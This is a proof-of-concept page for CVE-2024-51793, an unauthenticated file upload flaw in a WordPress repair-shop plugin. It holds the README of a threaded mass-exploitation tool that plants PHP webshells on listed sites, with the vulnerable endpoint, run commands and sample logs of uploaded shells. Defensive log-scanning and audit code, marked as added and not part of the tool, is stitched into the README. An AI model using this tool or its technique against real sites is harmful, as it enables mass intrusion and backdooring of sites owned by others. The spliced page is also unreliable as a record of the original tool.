CVE-2024-51793 PoC — WordPress plugin Computer Repair Shop code issue vulnerability

Associated Vulnerability
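Title: WordPress plugin Computer Repair Shop code issue vulnerability (CVE-2024-51793)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. A WordPress plugin is an application plugin. WordPress plugin Computer Repair Shop version 3.8115 and earlier contain a code issue vulnerability, which stems from an unrestricted upload of a file with a dangerous type.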
Readme
CVE-2024-51793 Exploit Tool Documentation
📋 Overview
CVE-2024-51793 is an unauthenticated arbitrary file upload vulnerability in the Computer Repair Shop WordPress plugin (versions prior to 3.8116). This vulnerability allows attackers to upload arbitrary files, including PHP webshells, without authentication, leading to remote code execution on vulnerable WordPress sites.

🚨 Vulnerability Details
CVE ID: CVE-2024-51793

Vulnerability Type: Unauthenticated Arbitrary File Upload

Affected Plugin: Computer Repair Shop WordPress Plugin

Affected Versions: < 3.8116

Risk Level: Critical (CVSS Score: 9.8)

🔧 Technical Details
The vulnerability exists in the wc_upload_file_ajax action handler in the plugin, which fails to properly validate file types and user authentication, allowing unauthenticated attackers to upload malicious files directly to the server.

📦 Installation & Requirements
Prerequisites
Python 3.6+

Required packages: requests

Installation
```bash
# Clone or download the script
git clone <repository-url>
cd cve-2024-51793-exploit

# Install required packages
pip install requests

# Or if you have requirements.txt
pip install -r requirements.txt
```
🛠️ Usage Guide
Basic Usage
```bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 50
```
Advanced Usage
```bash
# With custom output directory
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results

# With verbose output (if implemented)
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose
```
Command Line Arguments
| Argument | Short | Description | Default |
|----------|-------|-------------|---------|
| --list | -l | Path to file containing target URLs (required) | - |
| --threads | -t | Number of concurrent threads | 50 |
| --output | -o | Output directory for results | results |
Input File Format
Create a text file (targets.txt) with one URL per line:

```text
example.com
https://vulnerable-site.com
http://192.168.1.100/wordpress
test-site.org/blog
```
🔍 How It Works
1. Target Validation
The script first checks if the target is running the vulnerable plugin version by examining:

```text
/wp-content/plugins/computer-repair-shop/readme.txt
```
2. Version Detection
It verifies that the readme contains "CRM WordPress Plugin" and that the version is below 3.8116.

3. Exploitation
If vulnerable, the script uploads a PHP webshell via:

```text
POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax
```
4. Webshell Payload
The uploaded webshell provides:

File upload capability

Basic file management

Persistent backdoor access
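
The request and upload location described in the steps above leave traces in web server access logs. The following detection sketch is an added example, not part of the original tool or README; it assumes Combined Log Format, and the function names, the extension list and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions assumed to be mapped to the PHP handler; adjust to the server config.
PHP_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)

def classify(line):
    """Return (kind, client_ip, target, status) for a line worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path.lower()
    actions = parse_qs(parts.query).get("action", [])
    # The action name is only visible when sent in the query string, as in the
    # request shown above; an action sent in the POST body is not logged.
    if (m["method"] == "POST" and path.endswith("/wp-admin/admin-ajax.php")
            and "wc_upload_file_ajax" in actions):
        return ("upload_action", m["ip"], m["target"], int(m["status"]))
    # A request for a PHP file under uploads/ is suspicious on its own.
    if "/wp-content/uploads/" in path and PHP_EXT_RE.search(path):
        return ("php_in_uploads", m["ip"], m["target"], int(m["status"]))
    return None

def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, placeholder file name).
SAMPLE = [
    '203.0.113.7 - - [12/May/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax HTTP/1.1" 200 85 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [12/May/2024:10:01:03 +0000] "GET /wp-content/uploads/2024/05/example_upload.php HTTP/1.1" 200 412 "-" "python-requests/2.31.0"',
    '198.51.100.20 - - [12/May/2024:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [12/May/2024:10:02:01 +0000] "GET /wp-content/uploads/2024/05/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A `php_in_uploads` hit with a 200 status from the same client shortly after an `upload_action` hit is the pairing to prioritise during triage.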

📊 Output Files
The tool generates two main output files:

vulnerable_targets.txt - List of confirmed vulnerable URLs

webshells.txt - List of successfully uploaded webshell URLs

🎯 Example Execution
```bash
$ python3 cve_2024_51793_exploit.py -l targets.txt -t 30

    ╔══════════════════════════════════════════════════════════════╗
    ║                                                              ║
    ║  CVE-2024-51793 Exploit Tool                                ║
    ║  Unauthenticated RCE in Computer Repair Shop WP Plugin      ║
    ║                                                              ║
    ╚══════════════════════════════════════════════════════════════╝

 [ INFO ] Loaded 150 unique targets
 [ INFO ] Starting scan with 30 threads

 [ SCANNING ] Checking: http://example.com/
 [ VULNERABLE ] Target identified: http://example.com/
 [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php

 [ SCANNING ] Checking: http://testsite.com/
 [ NOT VULNERABLE ] Target: http://testsite.com/

 [ COMPLETED ] Scan finished successfully
```
🛡️ Defensive Measures
For Website Owners
Immediate Actions:

Update Computer Repair Shop plugin to version 3.8116 or later

Remove any uploaded malicious files

Scan for existing compromises

Preventive Measures:

Implement web application firewalls (WAF)

Regular security audits

File integrity monitoring
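
The immediate actions listed above (confirm the installed version, find uploaded files) can be checked directly on the server's filesystem. This is an added example, not code from the original tool; it assumes a standard WordPress directory layout and the standard `Stable tag:` header in the plugin's readme.txt, and the function names and extension list are hypothetical.

```python
import os
import re
import tempfile

FIXED = (3, 8116)  # first fixed release according to this page
PHP_EXTS = (".php", ".phtml", ".phar")  # assumed PHP handler mappings

def installed_version(readme_path):
    """Parse 'Stable tag:' (standard WordPress readme header) into an int tuple."""
    with open(readme_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = re.match(r"\s*Stable tag:\s*([0-9]+(?:\.[0-9]+)*)", line, re.IGNORECASE)
            if m:
                return tuple(int(p) for p in m.group(1).split("."))
    return None

def find_php_in_uploads(uploads_dir):
    """List PHP-executable files under uploads/ for manual review (not deletion)."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            if name.lower().endswith(PHP_EXTS):
                hits.append(os.path.relpath(os.path.join(root, name), uploads_dir))
    return sorted(hits)

def audit(wp_root):
    content = os.path.join(wp_root, "wp-content")
    readme = os.path.join(content, "plugins", "computer-repair-shop", "readme.txt")
    present = os.path.isfile(readme)
    version = installed_version(readme) if present else None
    return {
        "plugin_present": present,
        "version": version,
        # An unparseable version is treated as needing attention.
        "needs_update": present and (version is None or version < FIXED),
        "php_in_uploads": find_php_in_uploads(os.path.join(content, "uploads")),
    }

def demo():
    """Run the audit against a constructed directory tree with harmless files."""
    with tempfile.TemporaryDirectory() as root:
        plugin = os.path.join(root, "wp-content", "plugins", "computer-repair-shop")
        month = os.path.join(root, "wp-content", "uploads", "2024", "05")
        os.makedirs(plugin)
        os.makedirs(month)
        with open(os.path.join(plugin, "readme.txt"), "w") as fh:
            fh.write("=== CRM WordPress Plugin ===\nStable tag: 3.8115\n")
        for name in ("photo.jpg", "dropped.php"):
            with open(os.path.join(month, name), "w") as fh:
                fh.write("placeholder")
        return audit(root)
```

On a real host, call `audit()` with the WordPress root and review each listed file before removing it, since some sites keep a legitimate `index.php` stub in uploads.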

For Security Researchers
Use only in authorized environments

Follow responsible disclosure practices

Obtain proper permissions before testing

⚠️ Legal & Ethical Considerations
This tool is for educational and authorized security testing only

Unauthorized use against systems you don't own is illegal

Always obtain proper authorization before penetration testing

Follow responsible disclosure practices for found vulnerabilities

🔄 Maintenance
Updates
Regularly check for:

Script updates and improvements

Changes in vulnerability status

New detection methods

Troubleshooting
Common issues and solutions:

Connection Timeouts: Increase timeout values in session configuration

False Negatives: Verify target URLs are accessible

Rate Limiting: Reduce thread count and add delays

📞 Support
For issues and improvements:

Create issues on the project repository

Contact: TG: @KtN_1990

Disclaimer: This tool should only be used for legitimate security research and authorized penetration testing. The authors are not responsible for any misuse or damage caused by this tool.
File Snapshot

[4.0K] /data/pocs/af1ba0692a01986437c111b927af2121210b13e4
├── [10.0K] CVE-2024-51793.py
└── [5.2K] README.md

1 directory, 2 files